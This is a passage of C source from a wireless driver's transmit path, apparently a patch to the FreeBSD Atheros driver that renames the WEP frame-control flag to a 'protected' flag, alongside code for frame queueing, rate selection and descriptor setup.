struct ath_node *an = ATH_NODE(bf->bf_node); ATH_TX_LOCK_ASSERT(sc); if (an->clrdmask == 1) { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; an->clrdmask = 0; } } /* * Return whether this frame should be software queued or * direct dispatched. * * When doing powersave, BAR frames should be queued but other management * frames should be directly sent. * * When not doing powersave, stick BAR frames into the hardware queue * so it goes out even though the queue is paused. * * For now, management frames are also software queued by default. */ static int ath_tx_should_swq_frame(struct ath_softc *sc, struct ath_node *an, struct mbuf *m0, int *queue_to_head) { struct ieee80211_node *ni = &an->an_node; struct ieee80211_frame *wh; uint8_t type, subtype; wh = mtod(m0, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; (*queue_to_head) = 0; /* If it's not in powersave - direct-dispatch BAR */ if ((ATH_NODE(ni)->an_is_powersave == 0) && type == IEEE80211_FC0_TYPE_CTL && subtype == IEEE80211_FC0_SUBTYPE_BAR) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: BAR: TX'ing direct\n", __func__); return (0); } else if ((ATH_NODE(ni)->an_is_powersave == 1) && type == IEEE80211_FC0_TYPE_CTL && subtype == IEEE80211_FC0_SUBTYPE_BAR) { /* BAR TX whilst asleep; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: swq: TX'ing\n", __func__); (*queue_to_head) = 1; return (1); } else if ((ATH_NODE(ni)->an_is_powersave == 1) && (type == IEEE80211_FC0_TYPE_MGT || type == IEEE80211_FC0_TYPE_CTL)) { /* * Other control/mgmt frame; bypass software queuing * for now! */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: %6D: Node is asleep; sending mgmt " "(type=%d, subtype=%d)\n", __func__, ni->ni_macaddr, ":", type, subtype); return (0); } else { return (1); } } /* * Transmit the given frame to the hardware. * * The frame must already be setup; rate control must already have * been done. * * XXX since the TXQ lock is being held here (and I dislike holding * it for this long when not doing software aggregation), later on * break this function into "setup_normal" and "xmit_normal". The * lock only needs to be held for the ath_tx_handoff call. * * XXX we don't update the leak count here - if we're doing * direct frame dispatch, we need to be able to do it without * decrementing the leak count (eg multicast queue frames.) 
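Collapsing the branches of ath_tx_should_swq_frame() above into one predicate: BARs are direct-dispatched while the node is awake and queued at the head while it sleeps, other management/control frames are direct-dispatched only while the node sleeps, and everything else (including management frames to an awake node) is software queued. A simplified sketch with local enums:

```c
/*
 * Sketch of the dispatch policy in ath_tx_should_swq_frame() above.
 * Returns true if the frame should go onto the software queue.
 */
#include <stdbool.h>

enum ex_ftype { EX_F_MGT, EX_F_CTL_BAR, EX_F_CTL_OTHER, EX_F_DATA };

bool
ex_should_swq(enum ex_ftype type, bool node_asleep, bool *queue_to_head)
{
	*queue_to_head = false;

	if (type == EX_F_CTL_BAR) {
		if (!node_asleep)
			return (false);		/* awake: direct dispatch */
		*queue_to_head = true;		/* asleep: queue at the head */
		return (true);
	}
	if (node_asleep && (type == EX_F_MGT || type == EX_F_CTL_OTHER))
		return (false);			/* mgmt/ctl sent immediately */
	return (true);				/* everything else: swq */
}
```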
*/ static void ath_tx_xmit_normal(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { struct ath_node *an = ATH_NODE(bf->bf_node); struct ath_tid *tid = &an->an_tid[bf->bf_state.bfs_tid]; ATH_TX_LOCK_ASSERT(sc); /* * For now, just enable CLRDMASK. ath_tx_xmit_normal() does * set a completion handler however it doesn't (yet) properly * handle the strict ordering requirements needed for normal, * non-aggregate session frames. * * Once this is implemented, only set CLRDMASK like this for * frames that must go out - eg management/raw frames. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* Setup the descriptor before handoff */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* Track per-TID hardware queue depth correctly */ tid->hwq_depth++; /* Assign the completion handler */ bf->bf_comp = ath_tx_normal_comp; /* Hand off to hardware */ ath_tx_handoff(sc, txq, bf); } /* * Do the basic frame setup stuff that's required before the frame * is added to a software queue. * * All frames get mostly the same treatment and it's done once. * Retransmits fiddle with things like the rate control setup, * setting the retransmit bit in the packet; doing relevant DMA/bus * syncing and relinking it (back) into the hardware TX queue. * * Note that this may cause the mbuf to be reallocated, so * m0 may not be valid. */ static int ath_tx_normal_setup(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0, struct ath_txq *txq) { struct ieee80211vap *vap = ni->ni_vap; struct ath_hal *ah = sc->sc_ah; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct chanAccParams *cap = &ic->ic_wme.wme_chanParams; int error, iswep, ismcast, isfrag, ismrr; int keyix, hdrlen, pktlen, try0 = 0; u_int8_t rix = 0, txrate = 0; struct ath_desc *ds; struct ieee80211_frame *wh; u_int subtype, flags; HAL_PKT_TYPE atype; const HAL_RATE_TABLE *rt; HAL_BOOL shortPreamble; struct ath_node *an; u_int pri; /* * To ensure that both sequence numbers and the CCMP PN handling * is "correct", make sure that the relevant TID queue is locked. * Otherwise the CCMP PN and seqno may appear out of order, causing * re-ordered frames to have out of order CCMP PN's, resulting * in many, many frame drops. */ ATH_TX_LOCK_ASSERT(sc); wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); isfrag = m0->m_flags & M_FRAG; hdrlen = ieee80211_anyhdrsize(wh); /* * Packet length must not include any * pad bytes; deduct them here. */ pktlen = m0->m_pkthdr.len - (hdrlen & 3); /* Handle encryption twiddling if needed */ if (! ath_tx_tag_crypto(sc, ni, m0, iswep, isfrag, &hdrlen, &pktlen, &keyix)) { ath_freetx(m0); return EIO; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); pktlen += IEEE80211_CRC_LEN; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. 
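The length bookkeeping performed by ath_tx_normal_setup() and ath_tx_tag_crypto() above can be summarized in one helper: drop the 802.11 header pad bytes, add the cipher's header/trailer (plus the MIC when it is not computed in software), then add the FCS. The cipher sizes used in main() are sample input only (roughly TKIP-shaped) and are not taken from this commit.

```c
/*
 * Sketch of the over-the-air length calculation used above: strip the
 * header pad, add the crypto encapsulation, and account for the FCS.
 */
#include <stdio.h>

#define EX_CRC_LEN	4	/* IEEE80211_CRC_LEN */

int
ex_airtime_pktlen(int mbuf_len, int hdrlen, int cip_header, int cip_trailer,
    int cip_miclen, int swmic, int isfrag)
{
	int pktlen = mbuf_len - (hdrlen & 3);	/* drop header pad bytes */

	pktlen += cip_header + cip_trailer;	/* crypto encapsulation */
	if (!swmic && !isfrag)
		pktlen += cip_miclen;		/* MIC appended by hardware */
	return (pktlen + EX_CRC_LEN);		/* FCS added by hardware */
}

int
main(void)
{
	/* Padded QoS header (hdrlen 26), sample TKIP-like cipher sizes. */
	printf("len=%d\n", ex_airtime_pktlen(1526, 26, 8, 4, 8, 0, 0));
	return (0);
}
```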
*/ error = ath_tx_dmasetup(sc, bf, m0); if (error != 0) return error; bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ wh = mtod(m0, struct ieee80211_frame *); /* setup descriptors */ ds = bf->bf_desc; rt = sc->sc_currates; KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode)); /* * NB: the 802.11 layer marks whether or not we should * use short preamble based on the current mode and * negotiated parameters. */ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) { shortPreamble = AH_TRUE; sc->sc_stats.ast_tx_shortpre++; } else { shortPreamble = AH_FALSE; } an = ATH_NODE(ni); //flags = HAL_TXDESC_CLRDMASK; /* XXX needed for crypto errs */ flags = 0; ismrr = 0; /* default no multi-rate retry*/ pri = M_WME_GETAC(m0); /* honor classification */ /* XXX use txparams instead of fixed values */ /* * Calculate Atheros packet type from IEEE80211 packet header, * setup for rate calculations, and select h/w transmit queue. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) atype = HAL_PKT_TYPE_BEACON; else if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) atype = HAL_PKT_TYPE_PROBE_RESP; else if (subtype == IEEE80211_FC0_SUBTYPE_ATIM) atype = HAL_PKT_TYPE_ATIM; else atype = HAL_PKT_TYPE_NORMAL; /* XXX */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMGTTRY; flags |= HAL_TXDESC_INTREQ; /* force interrupt */ break; case IEEE80211_FC0_TYPE_CTL: atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMGTTRY; flags |= HAL_TXDESC_INTREQ; /* force interrupt */ break; case IEEE80211_FC0_TYPE_DATA: atype = HAL_PKT_TYPE_NORMAL; /* default */ /* * Data frames: multicast frames go out at a fixed rate, * EAPOL frames use the mgmt frame rate; otherwise consult * the rate control module for the rate to use. */ if (ismcast) { rix = an->an_mcastrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = 1; } else if (m0->m_flags & M_EAPOL) { /* XXX? maybe always use long preamble? */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMAXTRY; /* XXX?too many? */ } else { /* * Do rate lookup on each TX, rather than using * the hard-coded TX information decided here. */ ismrr = 1; bf->bf_state.bfs_doratelookup = 1; } if (cap->cap_wmeParams[pri].wmep_noackPolicy) flags |= HAL_TXDESC_NOACK; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); /* XXX statistic */ /* XXX free tx dmamap */ ath_freetx(m0); return EIO; } /* * There are two known scenarios where the frame AC doesn't match * what the destination TXQ is. * * + non-QoS frames (eg management?) that the net80211 stack has * assigned a higher AC to, but since it's a non-QoS TID, it's * being thrown into TID 16. TID 16 gets the AC_BE queue. * It's quite possible that management frames should just be * direct dispatched to hardware rather than go via the software * queue; that should be investigated in the future. There are * some specific scenarios where this doesn't make sense, mostly * surrounding ADDBA request/response - hence why that is special * cased. 
 *
 * + Multicast frames going into the VAP mcast queue.  That shows up
 *   as "TXQ 11".
 *
 * This driver should eventually support separate TID and TXQ locking,
 * allowing for arbitrary AC frames to appear on arbitrary software
 * queues, being queued to the "correct" hardware queue when needed.
 */
#if 0
	if (txq != sc->sc_ac2q[pri]) {
		DPRINTF(sc, ATH_DEBUG_XMIT,
		    "%s: txq=%p (%d), pri=%d, pri txq=%p (%d)\n",
		    __func__, txq, txq->axq_qnum, pri, sc->sc_ac2q[pri],
		    sc->sc_ac2q[pri]->axq_qnum);
	}
#endif

	/*
	 * Calculate miscellaneous flags.
	 */
	if (ismcast) {
		flags |= HAL_TXDESC_NOACK;	/* no ack on broad/multicast */
	} else if (pktlen > vap->iv_rtsthreshold &&
	    (ni->ni_ath_flags & IEEE80211_NODE_FF) == 0) {
		flags |= HAL_TXDESC_RTSENA;	/* RTS based on frame length */
		sc->sc_stats.ast_tx_rts++;
	}
	if (flags & HAL_TXDESC_NOACK)		/* NB: avoid double counting */
		sc->sc_stats.ast_tx_noack++;
#ifdef IEEE80211_SUPPORT_TDMA
	if (sc->sc_tdma && (flags & HAL_TXDESC_NOACK) == 0) {
		DPRINTF(sc, ATH_DEBUG_TDMA,
		    "%s: discard frame, ACK required w/ TDMA\n", __func__);
		sc->sc_stats.ast_tdma_ack++;
		/* XXX free tx dmamap */
		ath_freetx(m0);
		return EIO;
	}
#endif

	/*
	 * Determine if a tx interrupt should be generated for
	 * this descriptor.  We take a tx interrupt to reap
	 * descriptors when the h/w hits an EOL condition or
	 * when the descriptor is specifically marked to generate
	 * an interrupt.  We periodically mark descriptors in this
	 * way to ensure timely replenishing of the supply needed
	 * for sending frames.  Deferring interrupts reduces system
	 * load and potentially allows more concurrent work to be
	 * done, but if done too aggressively it can cause senders
	 * to back up.
	 *
	 * NB: use >= to deal with sc_txintrperiod changing
	 * dynamically through sysctl.
	 */
	if (flags & HAL_TXDESC_INTREQ) {
		txq->axq_intrcnt = 0;
	} else if (++txq->axq_intrcnt >= sc->sc_txintrperiod) {
		flags |= HAL_TXDESC_INTREQ;
		txq->axq_intrcnt = 0;
	}

	/* This point forward is actual TX bits */

	/*
	 * At this point we are committed to sending the frame
	 * and we don't need to look at m_nextpkt; clear it in
	 * case this frame is part of frag chain.
	 */
	m0->m_nextpkt = NULL;

	if (IFF_DUMPPKTS(sc, ATH_DEBUG_XMIT))
		ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len,
		    sc->sc_hwmap[rix].ieeerate, -1);

	if (ieee80211_radiotap_active_vap(vap)) {
		u_int64_t tsf = ath_hal_gettsf64(ah);

		sc->sc_tx_th.wt_tsf = htole64(tsf);
		sc->sc_tx_th.wt_flags = sc->sc_hwmap[rix].txflags;
		if (iswep)
			sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP;
		if (isfrag)
			sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_FRAG;
		sc->sc_tx_th.wt_rate = sc->sc_hwmap[rix].ieeerate;
		sc->sc_tx_th.wt_txpower = ieee80211_get_node_txpower(ni);
		sc->sc_tx_th.wt_antenna = sc->sc_txantenna;

		ieee80211_radiotap_tx(vap, m0);
	}

	/* Blank the legacy rate array */
	bzero(&bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc));

	/*
	 * ath_buf_set_rate needs at least one rate/try to setup
	 * the rate scenario.
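The interrupt mitigation policy described above boils down to a small counter; a standalone sketch (names are illustrative, not the driver's fields) of the decision is:

struct txq_state {
	int	intr_count;	/* descriptors queued since last INTREQ */
	int	intr_period;	/* mark every Nth descriptor */
};

/*
 * Decide whether this descriptor should request a TX interrupt:
 * forced descriptors always do and reset the counter; otherwise
 * every Nth descriptor is marked so the queue is reaped in time.
 * ">=" copes with the period being lowered at runtime.
 */
static int
want_tx_interrupt(struct txq_state *q, int forced)
{
	if (forced || ++q->intr_count >= q->intr_period) {
		q->intr_count = 0;
		return (1);
	}
	return (0);
}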
*/ bf->bf_state.bfs_rc[0].rix = rix; bf->bf_state.bfs_rc[0].tries = try0; bf->bf_state.bfs_rc[0].ratecode = txrate; /* Store the decided rate index values away */ bf->bf_state.bfs_pktlen = pktlen; bf->bf_state.bfs_hdrlen = hdrlen; bf->bf_state.bfs_atype = atype; bf->bf_state.bfs_txpower = ieee80211_get_node_txpower(ni); bf->bf_state.bfs_txrate0 = txrate; bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_keyix = keyix; bf->bf_state.bfs_txantenna = sc->sc_txantenna; bf->bf_state.bfs_txflags = flags; bf->bf_state.bfs_shpream = shortPreamble; /* XXX this should be done in ath_tx_setrate() */ bf->bf_state.bfs_ctsrate0 = 0; /* ie, no hard-coded ctsrate */ bf->bf_state.bfs_ctsrate = 0; /* calculated later */ bf->bf_state.bfs_ctsduration = 0; bf->bf_state.bfs_ismrr = ismrr; return 0; } /* * Queue a frame to the hardware or software queue. * * This can be called by the net80211 code. * * XXX what about locking? Or, push the seqno assign into the * XXX aggregate scheduler so its serialised? * * XXX When sending management frames via ath_raw_xmit(), * should CLRDMASK be set unconditionally? */ int ath_tx_start(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0) { struct ieee80211vap *vap = ni->ni_vap; struct ath_vap *avp = ATH_VAP(vap); int r = 0; u_int pri; int tid; struct ath_txq *txq; int ismcast; const struct ieee80211_frame *wh; int is_ampdu, is_ampdu_tx, is_ampdu_pending; ieee80211_seq seqno; uint8_t type, subtype; int queue_to_head; ATH_TX_LOCK_ASSERT(sc); /* * Determine the target hardware queue. * * For multicast frames, the txq gets overridden appropriately * depending upon the state of PS. * * For any other frame, we do a TID/QoS lookup inside the frame * to see what the TID should be. If it's a non-QoS frame, the * AC and TID are overridden. The TID/TXQ code assumes the * TID is on a predictable hardware TXQ, so we don't support * having a node TID queued to multiple hardware TXQs. * This may change in the future but would require some locking * fudgery. */ pri = ath_tx_getac(sc, m0); tid = ath_tx_gettid(sc, m0); txq = sc->sc_ac2q[pri]; wh = mtod(m0, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* * Enforce how deep the multicast queue can grow. * * XXX duplicated in ath_raw_xmit(). */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (sc->sc_cabq->axq_depth + sc->sc_cabq->fifo.axq_depth > sc->sc_txq_mcastq_maxdepth) { sc->sc_stats.ast_tx_mcastq_overflow++; m_freem(m0); return (ENOBUFS); } } /* * Enforce how deep the unicast queue can grow. * * If the node is in power save then we don't want * the software queue to grow too deep, or a node may * end up consuming all of the ath_buf entries. * * For now, only do this for DATA frames. * * We will want to cap how many management/control * frames get punted to the software queue so it doesn't * fill up. But the correct solution isn't yet obvious. * In any case, this check should at least let frames pass * that we are direct-dispatching. * * XXX TODO: duplicate this to the raw xmit path! 
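The two admission checks above (the multicast/CAB queue cap and the per-node power-save queue cap) follow the same shape; a minimal sketch of that shape, with hypothetical parameter names rather than the driver's softc fields, is:

#include <errno.h>

/*
 * Refuse a frame (ENOBUFS) when the queue it would land on is already
 * at its limit, so one multicast burst or one sleeping station cannot
 * exhaust the shared buffer pool.
 */
static int
tx_admission_check(int is_mcast, int cabq_depth, int cabq_max,
    int node_asleep, int node_swq_depth, int node_psq_max)
{
	if (is_mcast && cabq_depth > cabq_max)
		return (ENOBUFS);	/* mcast/CAB queue full */
	if (node_asleep && node_swq_depth > node_psq_max)
		return (ENOBUFS);	/* PS node hoarding buffers */
	return (0);
}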
*/ if (type == IEEE80211_FC0_TYPE_DATA && ATH_NODE(ni)->an_is_powersave && ATH_NODE(ni)->an_swq_depth > sc->sc_txq_node_psq_maxdepth) { sc->sc_stats.ast_tx_node_psq_overflow++; m_freem(m0); return (ENOBUFS); } /* A-MPDU TX */ is_ampdu_tx = ath_tx_ampdu_running(sc, ATH_NODE(ni), tid); is_ampdu_pending = ath_tx_ampdu_pending(sc, ATH_NODE(ni), tid); is_ampdu = is_ampdu_tx | is_ampdu_pending; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ac=%d, is_ampdu=%d\n", __func__, tid, pri, is_ampdu); /* Set local packet state, used to queue packets to hardware */ bf->bf_state.bfs_tid = tid; bf->bf_state.bfs_tx_queue = txq->axq_qnum; bf->bf_state.bfs_pri = pri; #if 1 /* * When servicing one or more stations in power-save mode * (or) if there is some mcast data waiting on the mcast * queue (to prevent out of order delivery) multicast frames * must be bufferd until after the beacon. * * TODO: we should lock the mcastq before we check the length. */ if (sc->sc_cabq_enable && ismcast && (vap->iv_ps_sta || avp->av_mcastq.axq_depth)) { txq = &avp->av_mcastq; /* * Mark the frame as eventually belonging on the CAB * queue, so the descriptor setup functions will * correctly initialise the descriptor 'qcuId' field. */ bf->bf_state.bfs_tx_queue = sc->sc_cabq->axq_qnum; } #endif /* Do the generic frame setup */ /* XXX should just bzero the bf_state? */ bf->bf_state.bfs_dobaw = 0; /* A-MPDU TX? Manually set sequence number */ /* * Don't do it whilst pending; the net80211 layer still * assigns them. */ if (is_ampdu_tx) { /* * Always call; this function will * handle making sure that null data frames * don't get a sequence number from the current * TID and thus mess with the BAW. */ seqno = ath_tx_tid_seqno_assign(sc, ni, bf, m0); /* * Don't add QoS NULL frames to the BAW. */ if (IEEE80211_QOS_HAS_SEQ(wh) && subtype != IEEE80211_FC0_SUBTYPE_QOS_NULL) { bf->bf_state.bfs_dobaw = 1; } } /* * If needed, the sequence number has been assigned. * Squirrel it away somewhere easy to get to. */ bf->bf_state.bfs_seqno = M_SEQNO_GET(m0) << IEEE80211_SEQ_SEQ_SHIFT; /* Is ampdu pending? fetch the seqno and print it out */ if (is_ampdu_pending) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid %d: ampdu pending, seqno %d\n", __func__, tid, M_SEQNO_GET(m0)); /* This also sets up the DMA map */ r = ath_tx_normal_setup(sc, ni, bf, m0, txq); if (r != 0) goto done; /* At this point m0 could have changed! */ m0 = bf->bf_m; #if 1 /* * If it's a multicast frame, do a direct-dispatch to the * destination hardware queue. Don't bother software * queuing it. */ /* * If it's a BAR frame, do a direct dispatch to the * destination hardware queue. Don't bother software * queuing it, as the TID will now be paused. * Sending a BAR frame can occur from the net80211 txa timer * (ie, retries) or from the ath txtask (completion call.) * It queues directly to hardware because the TID is paused * at this point (and won't be unpaused until the BAR has * either been TXed successfully or max retries has been * reached.) */ /* * Until things are better debugged - if this node is asleep * and we're sending it a non-BAR frame, direct dispatch it. * Why? Because we need to figure out what's actually being * sent - eg, during reassociation/reauthentication after * the node (last) disappeared whilst asleep, the driver should * have unpaused/unsleep'ed the node. So until that is * sorted out, use this workaround. 
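The sequence number squirrelled away above is stored pre-shifted because the 802.11 Sequence Control field keeps the fragment number in bits 0-3 and the 12-bit sequence number in bits 4-15. A standalone sketch of that packing (constants restated locally for illustration; the real field is little-endian on the wire, so the driver byte-swaps with htole16):

#include <stdint.h>

#define SEQ_RANGE	4096	/* 12-bit sequence space */
#define SEQ_SHIFT	4
#define FRAG_MASK	0x000f

static uint16_t
pack_seqctl(uint16_t seqno, uint16_t fragno)
{
	return ((uint16_t)((seqno % SEQ_RANGE) << SEQ_SHIFT) |
	    (fragno & FRAG_MASK));
}

static uint16_t
unpack_seqno(uint16_t seqctl)
{
	return (seqctl >> SEQ_SHIFT);
}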
*/ if (txq == &avp->av_mcastq) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: mcastq: TX'ing\n", __func__, bf); bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, txq, bf); } else if (ath_tx_should_swq_frame(sc, ATH_NODE(ni), m0, &queue_to_head)) { ath_tx_swq(sc, ni, txq, queue_to_head, bf); } else { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, txq, bf); } #else /* * For now, since there's no software queue, * direct-dispatch to the hardware. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); ath_tx_xmit_normal(sc, txq, bf); #endif done: return 0; } static int ath_tx_raw_start(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ath_hal *ah = sc->sc_ah; struct ieee80211vap *vap = ni->ni_vap; int error, ismcast, ismrr; int keyix, hdrlen, pktlen, try0, txantenna; u_int8_t rix, txrate; struct ieee80211_frame *wh; u_int flags; HAL_PKT_TYPE atype; const HAL_RATE_TABLE *rt; struct ath_desc *ds; u_int pri; int o_tid = -1; int do_override; uint8_t type, subtype; int queue_to_head; ATH_TX_LOCK_ASSERT(sc); wh = mtod(m0, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); hdrlen = ieee80211_anyhdrsize(wh); /* * Packet length must not include any * pad bytes; deduct them here. */ /* XXX honor IEEE80211_BPF_DATAPAD */ pktlen = m0->m_pkthdr.len - (hdrlen & 3) + IEEE80211_CRC_LEN; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; ATH_KTR(sc, ATH_KTR_TX, 2, "ath_tx_raw_start: ni=%p, bf=%p, raw", ni, bf); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: ismcast=%d\n", __func__, ismcast); pri = params->ibp_pri & 3; /* Override pri if the frame isn't a QoS one */ if (! IEEE80211_QOS_HAS_SEQ(wh)) pri = ath_tx_getac(sc, m0); /* XXX If it's an ADDBA, override the correct queue */ do_override = ath_tx_action_frame_override_queue(sc, ni, m0, &o_tid); /* Map ADDBA to the correct priority */ if (do_override) { #if 0 DPRINTF(sc, ATH_DEBUG_XMIT, "%s: overriding tid %d pri %d -> %d\n", __func__, o_tid, pri, TID_TO_WME_AC(o_tid)); #endif pri = TID_TO_WME_AC(o_tid); } /* Handle encryption twiddling if needed */ if (! ath_tx_tag_crypto(sc, ni, m0, params->ibp_flags & IEEE80211_BPF_CRYPTO, 0, &hdrlen, &pktlen, &keyix)) { ath_freetx(m0); return EIO; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); /* Do the generic frame setup */ /* XXX should just bzero the bf_state? */ bf->bf_state.bfs_dobaw = 0; error = ath_tx_dmasetup(sc, bf, m0); if (error != 0) return error; m0 = bf->bf_m; /* NB: may have changed */ wh = mtod(m0, struct ieee80211_frame *); bf->bf_node = ni; /* NB: held reference */ /* Always enable CLRDMASK for raw frames for now.. */ flags = HAL_TXDESC_CLRDMASK; /* XXX needed for crypto errs */ flags |= HAL_TXDESC_INTREQ; /* force interrupt */ if (params->ibp_flags & IEEE80211_BPF_RTS) flags |= HAL_TXDESC_RTSENA; else if (params->ibp_flags & IEEE80211_BPF_CTS) { /* XXX assume 11g/11n protection? */ bf->bf_state.bfs_doprot = 1; flags |= HAL_TXDESC_CTSENA; } /* XXX leave ismcast to injector? 
*/ if ((params->ibp_flags & IEEE80211_BPF_NOACK) || ismcast) flags |= HAL_TXDESC_NOACK; rt = sc->sc_currates; KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode)); rix = ath_tx_findrix(sc, params->ibp_rate0); txrate = rt->info[rix].rateCode; if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) txrate |= rt->info[rix].shortPreamble; sc->sc_txrix = rix; try0 = params->ibp_try0; ismrr = (params->ibp_try1 != 0); txantenna = params->ibp_pri >> 2; if (txantenna == 0) /* XXX? */ txantenna = sc->sc_txantenna; /* * Since ctsrate is fixed, store it away for later * use when the descriptor fields are being set. */ if (flags & (HAL_TXDESC_RTSENA|HAL_TXDESC_CTSENA)) bf->bf_state.bfs_ctsrate0 = params->ibp_ctsrate; /* * NB: we mark all packets as type PSPOLL so the h/w won't * set the sequence number, duration, etc. */ atype = HAL_PKT_TYPE_PSPOLL; if (IFF_DUMPPKTS(sc, ATH_DEBUG_XMIT)) ieee80211_dump_pkt(ic, mtod(m0, caddr_t), m0->m_len, sc->sc_hwmap[rix].ieeerate, -1); if (ieee80211_radiotap_active_vap(vap)) { u_int64_t tsf = ath_hal_gettsf64(ah); sc->sc_tx_th.wt_tsf = htole64(tsf); sc->sc_tx_th.wt_flags = sc->sc_hwmap[rix].txflags; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (m0->m_flags & M_FRAG) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_FRAG; sc->sc_tx_th.wt_rate = sc->sc_hwmap[rix].ieeerate; sc->sc_tx_th.wt_txpower = MIN(params->ibp_power, ieee80211_get_node_txpower(ni)); sc->sc_tx_th.wt_antenna = sc->sc_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Formulate first tx descriptor with tx controls. */ ds = bf->bf_desc; /* XXX check return value? */ /* Store the decided rate index values away */ bf->bf_state.bfs_pktlen = pktlen; bf->bf_state.bfs_hdrlen = hdrlen; bf->bf_state.bfs_atype = atype; bf->bf_state.bfs_txpower = MIN(params->ibp_power, ieee80211_get_node_txpower(ni)); bf->bf_state.bfs_txrate0 = txrate; bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_keyix = keyix; bf->bf_state.bfs_txantenna = txantenna; bf->bf_state.bfs_txflags = flags; bf->bf_state.bfs_shpream = !! (params->ibp_flags & IEEE80211_BPF_SHORTPRE); /* Set local packet state, used to queue packets to hardware */ bf->bf_state.bfs_tid = WME_AC_TO_TID(pri); bf->bf_state.bfs_tx_queue = sc->sc_ac2q[pri]->axq_qnum; bf->bf_state.bfs_pri = pri; /* XXX this should be done in ath_tx_setrate() */ bf->bf_state.bfs_ctsrate = 0; bf->bf_state.bfs_ctsduration = 0; bf->bf_state.bfs_ismrr = ismrr; /* Blank the legacy rate array */ bzero(&bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc)); bf->bf_state.bfs_rc[0].rix = ath_tx_findrix(sc, params->ibp_rate0); bf->bf_state.bfs_rc[0].tries = try0; bf->bf_state.bfs_rc[0].ratecode = txrate; if (ismrr) { int rix; rix = ath_tx_findrix(sc, params->ibp_rate1); bf->bf_state.bfs_rc[1].rix = rix; bf->bf_state.bfs_rc[1].tries = params->ibp_try1; rix = ath_tx_findrix(sc, params->ibp_rate2); bf->bf_state.bfs_rc[2].rix = rix; bf->bf_state.bfs_rc[2].tries = params->ibp_try2; rix = 